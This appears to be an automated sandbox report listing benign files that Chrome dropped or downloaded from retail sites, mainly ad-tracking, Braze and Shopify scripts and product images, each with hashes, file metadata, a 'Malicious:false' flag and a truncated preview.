                                                                                                                                                                                    Preview:import.meta;var Vn=Object.defineProperty,zn=Object.defineProperties,qn=Object.getOwnPropertyDescriptors,dr=Object.getOwnPropertySymbols,jn=Object.prototype.hasOwnProperty,Wn=Object.prototype.propertyIsEnumerable,Ae=(e,t)=>(t=Symbol[e])?t:Symbol.for("Symbol."+e),ur=e=>{throw TypeError(e)},Ce=(e,t,n)=>t in e?Vn(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,w=(e,t)=>{for(var n in t||(t={}))jn.call(t,n)&&Ce(e,n,t[n]);if(dr)for(var n of dr(t))Wn.call(t,n)&&Ce(e,n,t[n]);return e},P=(e,t)=>zn(e,qn(t)),d=(e,t,n)=>Ce(e,typeof t!="symbol"?t+"":t,n),hr=(e,t,n)=>t.has(e)||ur("Cannot "+n),E=(e,t,n)=>(hr(e,t,"read from private field"),n?n.call(e):t.get(e)),V=(e,t,n)=>t.has(e)?ur("Cannot add the same private member more than once"):t instanceof WeakSet?t.add(e):t.set(e,n),Y=(e,t,n,r)=>(hr(e,t,"write to private field"),r?r.call(e,n):t.set(e,n),n),z=function(e,t){this[0]=e,this[1]=t},_t=(e,t,n)=>{var r=(o,s,l,c)=>{try{var h=n[o](s),p=(s=h.value)instanceof z,m=h.done;Promise.resolve(p?
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):502
                                                                                                                                                                                    Entropy (8bit):4.846328767345814
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:A1BRmRcDewSDJLfJ77vN8UYyXOVGqQqWSjJy/U6:gmRWejVLx77v+UhXOVGq3vjM/v
                                                                                                                                                                                    MD5:3D30157088D8A00CBAEA9E9F7477A293
                                                                                                                                                                                    SHA1:3C96D8A2D85DDD20F4F9DDB70C636A21A702E262
                                                                                                                                                                                    SHA-256:7FA301335A82162652791FDED5C6F62EC09CCE2B07BC3122AE55D9E06899ABD7
                                                                                                                                                                                    SHA-512:05B4DE97B7608AD5644A25C48C4F36DD05433D7734DBEC3748F6AB0C8B6E1365F405B26F7A2D840B53674186F11C94BDB632430BA089E1A8439E200ABBC94864
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function reconcileEmail(i){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function o(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function t(e){const n=100;window.setTimeout(function(){if(o()!==null&&o().getUser()){e()}else{t(e)}},n)}t(function(){o().getDeviceId(function(e){var n=e;if(n==null){console.warn(`No active session, cannot set user email`)}else{o().getUser().setEmail(i)}})})}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):502
                                                                                                                                                                                    Entropy (8bit):4.846328767345814
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:A1BRmRcDewSDJLfJ77vN8UYyXOVGqQqWSjJy/U6:gmRWejVLx77v+UhXOVGq3vjM/v
                                                                                                                                                                                    MD5:3D30157088D8A00CBAEA9E9F7477A293
                                                                                                                                                                                    SHA1:3C96D8A2D85DDD20F4F9DDB70C636A21A702E262
                                                                                                                                                                                    SHA-256:7FA301335A82162652791FDED5C6F62EC09CCE2B07BC3122AE55D9E06899ABD7
                                                                                                                                                                                    SHA-512:05B4DE97B7608AD5644A25C48C4F36DD05433D7734DBEC3748F6AB0C8B6E1365F405B26F7A2D840B53674186F11C94BDB632430BA089E1A8439E200ABBC94864
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-email-script.min.js?api_key=f835946b-0d19-4768-88b1-9c8df850c4bc&sdk_url=sdk.iad-03.braze.com&shop=26f4aa-09.myshopify.com&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:function reconcileEmail(i){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function o(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function t(e){const n=100;window.setTimeout(function(){if(o()!==null&&o().getUser()){e()}else{t(e)}},n)}t(function(){o().getDeviceId(function(e){var n=e;if(n==null){console.warn(`No active session, cannot set user email`)}else{o().getUser().setEmail(i)}})})}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2636
                                                                                                                                                                                    Entropy (8bit):7.146365920829235
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxdwfMosAAHQevWxmsH5w1AsHTcUIcfY6P33u2+YGs9:NBIl/Xrxds8SYsZw1AmAARn
                                                                                                                                                                                    MD5:1AFF06C6DADFD139B1C8100218AEA0DC
                                                                                                                                                                                    SHA1:8CCEF2F79C054CFAC67968BC19B56E272D048830
                                                                                                                                                                                    SHA-256:48F2E519181DF757D127972FA11B4B66B03D2CEBED2B992CA2DA84E6ACA4653D
                                                                                                                                                                                    SHA-512:89EFB9AF5D3569B86CFA2CB5CAF4361DC24643FC4942C72863543E77166ADCD2439FDCB294484F22A9FF1BC4AEBA172221422A01A2CF7BDF70F1668B9CE27904
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................X........SI"G$(.......f.}%M6..1....K....W.t{.z.........L.m.....Z.=...Js..WK....'>...z.k.|.y.wk..U.R,..._<.1...f.....4...*..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1339
                                                                                                                                                                                    Entropy (8bit):5.229001559788375
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2QLmRWeyVLx7gE+oxFrHXNlDLDOLQOTjy88oqEFsGdKcR0sqRWZGKjRF2VFkZXy0:6ELxEEzxFrHzMSWqssGdR0sqw0Aj2vkJ
                                                                                                                                                                                    MD5:956F63A2A49369D5F5244CF8AD04D0BE
                                                                                                                                                                                    SHA1:1BE07A341EB069FF011FF4364069F30780186798
                                                                                                                                                                                    SHA-256:70E2780960DA0799B00EE4AD9FC7388B87E24D8617548EBBDC301818BE8E877F
                                                                                                                                                                                    SHA-512:3239E1C08CCA30333BDD8D6B2EE1D2077B5805E68B844F29F166586E19C558F266C5589C741AFB72B26F31A334C2C8EEDD1B029E0B4ECC4038F2EF5EBCF38A2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function t(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}const l="reconciledCheckouts";var s=null;const c=JSON.parse(localStorage.getItem("__ui"));if(c!=null&&typeof c=="object"&&c.length>2){if(c[2]!=null&&typeof c[2]=="object"&&typeof c[2][0]=="object"){s=c[2][0]["checkoutSessionIdentifier"]}}if(s==null){return}t().getDeviceId(function(e){var t=e;if(t==null){console.warn(`Cannot reconcile checkout ${s} because Braze device ID cannot be obtained`)}else{const c=JSON.parse(localStorage.getItem(l)||"{}");const n=c[s]||null;if(n==t){return}else{c[s]=t;localStorage.setItem(l,JSON.stringify(c))}const o=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-checkout-script")));const i=new URLSearchParams(o.search);const r=Object.fromEntries(i.entries());fetch("https://"+r["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1943
                                                                                                                                                                                    Entropy (8bit):6.70058846108106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxYN7yUsBhHK8q8gFYQVjgU4QzE:NBIl/XrxAns3lqHfVjgoE
                                                                                                                                                                                    MD5:010AA6CF2A0559A79835B0DECCD1DA1B
                                                                                                                                                                                    SHA1:8D98285197FDA378CC32B293838FD613D5510DCD
                                                                                                                                                                                    SHA-256:9B43BDBD84412E3485DE36359301688BE448F5A535DC208F62E88FE2EB700595
                                                                                                                                                                                    SHA-512:4A4312E5BBF153933A150C46AE53CD221CBE30F2BD6EB1F94421A598D6EF65C5BB2053ABA5443F67E6BBEBF349B650395C9F34E52099C49B71975A0C3DE4520F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P......................................................................................-...@ #.3.3..u.Ip.......<,s^5.I.VX..l...5.d.j$.\..i"....MY.x..#.[6K..J...}.................?.........................!.1..."AQaq...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7311), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7311
                                                                                                                                                                                    Entropy (8bit):5.667670208437893
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxgWcbS8Bb/BhzBNYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xgWce89/PzHYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:A951CDFFB42EA0EB44F9D1DB13C04C70
                                                                                                                                                                                    SHA1:DA2053A09F912367DACC25B6EE8F19E88FBB6D72
                                                                                                                                                                                    SHA-256:62FE5F0F2BA9468C4456173ABDB8D62CC2E05F6D5BCF6678EE9EF780FD5AAC2E
                                                                                                                                                                                    SHA-512:B9AE250511191B8C1F24A2B890BFA6F9096F99FD63979FD2F36CCD15FF9E407CB370A4CB3AC8BA5581443F0DBEBC753FD785A9B685D4D90AFBDDEA866E2D9406
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294548789&cv=11&fst=1730294548789&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2F&ref=https%3A%2F%2F72w0xk.mativacyrin.com%2F&top=https%3A%2F%2Fwww.overstock.com&hn=www.googleadservices.com&frm=2&tiba=Explore%20the%20New%20Overstock&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dhomepage
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BFw!3sAAptDV7SB_DM","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BFw!3sAAptDV7SB_DM"],"userBiddingSignals":[["8605218413","8604994774","8605163949","8605118546","8604357350","8605899945","8605117709","8526177074","8604992644"],null,1730294551114189],"ads
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2521)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2622
                                                                                                                                                                                    Entropy (8bit):4.9555163144525824
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:RDNpJHSLA1X23pb7g5S9y8r1bKj1bKoCs3rSLb/xNI:RFzKbJt8XCDRq
                                                                                                                                                                                    MD5:3664E9F7501BC326A468CBF2239755BC
                                                                                                                                                                                    SHA1:E68A1FE039150E0D261A8CBDA85E39AA608D1B8D
                                                                                                                                                                                    SHA-256:E9D057D4A383917D1B4E0EA60D18945BCC7DBD94B395BA33359CEEE4328070D0
                                                                                                                                                                                    SHA-512:16975459FD9AECAFBF5B05091017D3EF66546BF3D2E4F5CF4AF70EC3E6BABB29AC28F0DD56B7E0E95715FFD839C3672A83CD434A05B9848C84BF940BEDE37D55
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/product-message.js?v=109559992369320503431730157903
                                                                                                                                                                                    Preview:if(!customElements.get("product-message")){class ProductMessage extends HTMLElement{constructor(){super(),this.closeButton=this.querySelector(".js-close-message"),this.openInEditor=!1,this.init(),this.bindEvents()}disconnectedCallback(){this.blockSelectHandler&&document.removeEventListener("shopify:block:select",this.blockSelectHandler),this.blockDeselectHandler&&document.removeEventListener("shopify:block:deselect",this.blockDeselectHandler)}init(){let preventShow=!1;if(this.dataset.persistentClose&&!Shopify.designMode){const closedMessages=theme.storageUtil.get("closed-messages",!0)||[];closedMessages&&closedMessages.includes(this.dataset.blockId)&&(preventShow=!0,this.remove())}this.classList.contains("product-message--out")&&(!preventShow||Shopify.designMode)&&(this.show(!this.dataset.transient),this.dataset.transient&&setTimeout(()=>{this.openInEditor||this.hide(!1)},this.dataset.transient*1e3))}bindEvents(){this.closeButton&&this.closeButton.addEventListener("click",this.handleCl
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):15978
                                                                                                                                                                                    Entropy (8bit):7.951071952345236
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:E7ADjx2QR/Wkb9dOJB2nAwoxPvR7V1BOjeTrJosCOlAES:E7e2Q5tbfOjlJBOjstCr
                                                                                                                                                                                    MD5:B4BFA680764A1443C26312670E0A0838
                                                                                                                                                                                    SHA1:3CADCC1F342621E064B8A612AF23B100DC79BDAE
                                                                                                                                                                                    SHA-256:8ECEE671293F26DC32FEB074AC5AEF641521CAFD7C6D74AC4CFF0A098F99BAB9
                                                                                                                                                                                    SHA-512:EDC09DA940F52599CECFC83716AEF89796357B72E9ABC6E7A93D49C8BF66B200CB3C4FC24163ACD676585C7D8DCF02DBA54F71C2B1A23980DC61501AE4EB6779
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/30_22-Freestanding-Bathroom-Vanity-with-Soft-Closing-Drawers_3efa869f-ecc2-416f-876a-2705c925359b.jpg?v=1720507037&width=320
                                                                                                                                                                                    Preview:RIFFb>..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .;.......*@.@.>9..D"!.... ........h.C....@vZ..$..0cS..y.g~.......J.q...3.S.........~u>._...a.../..R.%..&..E....z....?....W.#.'..3z.._...{.{y.O....z...S.o.. ?......O....`o....{B......?..................g~...g%B&..... .. *....p.V.v.~}..k..O....e&..mwY.uZa...z.:6.....6N..D.vJ....O0....;.j..2..dN..."..F..4P.Mx....;........F....Y......K.y..v=].P[G{.G..B....E...[Yu.....T.g..\..j.M....;.C...j=.....le.....$...b. nxP..N.%..Y.~...u.H$$*.|'9.h...r.U.S.@.X.......t...u....7....f......7.?....o4.Ct/.>. .......YyO....c
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1947
                                                                                                                                                                                    Entropy (8bit):6.708860298886194
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxZ7sQf2P0MOSl1k5ZupyCnOkseY:NBIl/XrxZoU2y4kBjeY
                                                                                                                                                                                    MD5:21685EE65BA4AFDC1041FED772179378
                                                                                                                                                                                    SHA1:2978B9457E1FFF02FB2E9C4DF7E25892D7B480F4
                                                                                                                                                                                    SHA-256:A8FCDF6D4311A60529F9E86D56D8753C110977D3FFBAEB28179F96C0AD01F439
                                                                                                                                                                                    SHA-512:804F566EFBF933A45F85ECCDFFB11576AA7951493EE2C38CEBD6DD30E24E076D7AC294EA8E8F1518AC5C70D24C4D1CFD3C6E33755C1879B569C32150B7CA898E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................,...........C..2.*.D.l.O[..1...N\.l.KrH."...;.=..p...,h.U#..W...;.].]K.1 .....[.4..............8.........................!...1A...".abq.@
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4926), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4926
                                                                                                                                                                                    Entropy (8bit):5.841492840452049
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU8WmE5i6O:1DY0hf1bT47OIqWb1RWml6O
                                                                                                                                                                                    MD5:783271B9A35C4493D2D7D36EA9CFF1B9
                                                                                                                                                                                    SHA1:5DE6E24D15C2E959540079F8431352756D188D7F
                                                                                                                                                                                    SHA-256:C52247C6C6F43E02488A870D92DC5747D7AB4FDDCC8959089E728ABCDB137A22
                                                                                                                                                                                    SHA-512:0036B4673CDB2726298B022E3B667B1905230944EB04A55FCAA856D080B8D0FB3FB4D1D095C07B56433CCD7FD1F5FF618723E22E207794A1F797F96F26B0AA1F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1069816607/?random=1730294606068&cv=11&fst=1730294606068&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view&rfmt=3&fmt=4
                                                                                                                                                                                    Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (18850)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18865
                                                                                                                                                                                    Entropy (8bit):5.187115085468122
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:gggIoLxpxNRGwUhJB95bFH8dUT+RCgsxZ26Cm168ePJLakOQKq3:8Lxb3hEJBPNsRseFP
                                                                                                                                                                                    MD5:9C5D1B58EE551D992D10FED3A5972EB9
                                                                                                                                                                                    SHA1:26596A5222F80A3E544B283B112D05479FE16ACA
                                                                                                                                                                                    SHA-256:2FAEE16B7095F268D3A3B7A7F912CB02D370C5E582C6AAC28DA24AAFEC87EC61
                                                                                                                                                                                    SHA-512:9A2A747C6810D71860EE3698B6061A7A35B6A1CD7BFADA5A2F263215FE2C8B64545AB086FB690B8C1713954E7B56F28A5C43D75ED87F3A2884BF4E781BE825DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shopifycloud/perf-kit/shopify-perf-kit-1.0.1.min.js
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart||e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete||e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t||100)-1)return n||i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2319)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):968831
                                                                                                                                                                                    Entropy (8bit):5.31962929537484
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:YMa64WUciIlKptgv6FzZ84zYipmPUjoaGcELRZVIsYf:YY4WM
                                                                                                                                                                                    MD5:8BE65C44ADD89FCA4084D545C8A4335C
                                                                                                                                                                                    SHA1:E8DA0914C1D61356CF5735BFCA8EF78F4D3DFD98
                                                                                                                                                                                    SHA-256:375DF3C0AE262C5BD42A8AAB9301D9A20031C81653EE3295251F4057EEA91B6A
                                                                                                                                                                                    SHA-512:115C19643AB803049B7EBEADE9E961F290FCFEF068FDA1B3611A9601BAE3E73E08D841351943E0EDEEAB86C95AB63430D33375CC179D0524733A9203C32F9E50
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/recommendations/products?section_id=template--16930125217951__main&product_id=9259088707743&limit=4&intent=complementary&product_id=9259088707743
                                                                                                                                                                                    Preview:<div id="shopify-section-template--16930125217951__main" class="shopify-section cc-main-product product-main"><link href="//www.overstock.com/cdn/shop/t/224/assets/component-rating.css?v=111083418062392971531730157903" rel="stylesheet" type="text/css" media="all" />..<link rel="stylesheet" href="//www.overstock.com/cdn/shop/t/224/assets/component-reviews.css?v=95942729648472401811730157903" media="print" onload="this.media='all'">.<link rel="stylesheet" href="//www.overstock.com/cdn/shop/t/224/assets/os-pdp.css?v=82570473233433357701730157903" media="print" onload="this.media='all'">.<link href="//www.overstock.com/cdn/shop/t/224/assets/product.css?v=81253555964418955201730157903" rel="stylesheet" type="text/css" media="all" />.<link href="//www.overstock.com/cdn/shop/t/224/assets/product-page.css?v=7214178851081366811730157903" rel="stylesheet" type="text/css" media="all" />.<link href="//www.overstock.com/cdn/shop/t/224/assets/component-reference-pricing.css?v=16003236879009617643173
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2904)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3010
                                                                                                                                                                                    Entropy (8bit):4.922287152206755
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:RBqQXJ9iZhp3usz3/QXxurS8eQXmuo89mC+IjuAjXxA8EE8ES8E+xNt8:/gzeEDPhjgqxJwWZH8
                                                                                                                                                                                    MD5:4DA8A51FBC91D7586A9AC058D8631A24
                                                                                                                                                                                    SHA1:8A2673372D9EC4E57D58C7B3E7123F0C36AE34D1
